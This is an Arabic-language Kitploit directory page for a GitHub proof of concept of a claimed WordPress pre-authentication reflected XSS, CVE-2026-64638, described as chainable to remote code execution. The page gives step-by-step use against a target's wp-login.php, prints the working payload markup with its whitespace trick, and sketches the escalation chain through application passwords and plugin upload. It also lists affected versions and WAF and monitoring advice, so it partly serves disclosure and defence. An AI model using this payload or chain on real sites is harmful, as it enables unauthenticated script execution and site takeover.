Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-64638 — إثبات مفهوم من ملف HTML واحد لثغرة XSS منعكسة قبل المصادقة في WordPress (CVE-2026-64638)، يعرض تنفيذ JavaScript غير مصادَق عليه وسلسلة تحويل من XSS إلى RCE عبر DOM clobbering ورفع كلمة مرور التطبيق. | Kitploit
أدوات/GitHubGitHub/4minx/cve-2026-64638
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقتطوير الحمولات
GitHub4minx/cve-2026-64638

CVE-2026-64638

إثبات مفهوم من ملف HTML واحد لثغرة XSS منعكسة قبل المصادقة في WordPress (CVE-2026-64638)، يعرض تنفيذ JavaScript غير مصادَق عليه وسلسلة تحويل من XSS إلى RCE عبر DOM clobbering ورفع كلمة مرور التطبيق.

عرض المستودع
1منذ 13 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تنبيه XSS2Shell PoC (CVE-2026-64638)

إثبات مفهوم XSS انعكاسية قبل المصادقة في WordPress

إثبات مفهوم بملف HTML واحد لثغرة CVE-2026-64638 (XSS2Shell)، وهي ثغرة XSS تعتمد على الفروقات بين المحلِّلات في نواة WordPress. تُظهر تنفيذ JavaScript غير مصادق عليه في أصل WordPress عبر طلب تسجيل دخول مُصمَّم خصيصًا.


معلومات الثغرة

  • CVE: CVE-2026-64638 (XSS2Shell)
  • النوع: XSS انعكاسي قبل المصادقة (فرق بين المحلِّلات: strip_tags() مقابل wp_kses_post())
  • التصعيد: يمكن ربطها بسلسلة تصل إلى RCE (DOM clobbering ← REST JSONP ← SOME ← كلمة مرور التطبيق ← رفع إضافة)
  • الإصدارات المتأثرة: WordPress 6.4 – 7.0.2 (النطاق القابل للاستغلال عمليًا)
  • تم الإصلاح في: WordPress 7.0.3 (مع توفير التصحيح للفروع المُدعومة حتى 4.7)

طريقة الاستخدام

  1. افتح POC.html في محرر نصوص.
  2. استبدل http://TARGET/wp-login.php في خاصية action الخاصة بالنموذج بهدفك.
root@kitploit:~
<form id="poc" method="post" action="http://TARGET/wp-login.php">
  1. افتح الملف في متصفح. سيتم إرسال النموذج تلقائيًا؛ إذا كان الهدف ضعيفًا، ستظهر نافذة منبثقة confirm() (أو alert()) في أصل WordPress.

حمولة PoC

root@kitploit:~
< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X

المسافة بعد كل < هي جوهر الاستغلال. بدونها، يزيل wp_strip_all_tags() كل شيء.


المتطلبات

  • تثبيت WordPress ضعيف (6.4 – 7.0.2، غير مُحدَّث)
  • متصفح مع تفعيل JavaScript
  • لا توجد اعتماديات على أدوات خارجية (HTML خالص)

الكشف / التخفيف

  • قم بالترقية إلى WordPress 7.0.3 أو فرع مُصحَّح.
  • ألغِ/بدّل جميع كلمات مرور التطبيقات الموجودة بعد تطبيق التصحيح.
  • احظر أنماط %3C + مسافة بيضاء في الحقل log على مستوى WAF/الحافة.
  • راقب طلبات POST /wp-login.php التي يحتوي فيها log على < مُرمَّز.

المراجع

  • pwn.ai — سلسلة XSS2Shell: من XSS قبل المصادقة في WordPress إلى RCE
  • إصدار WordPress 7.0.3
  • Hadrian — تحليل CVE-2026-64638
  • IONSEC — التحليل الفني لـ XSS2Shell
تنزيل الأداة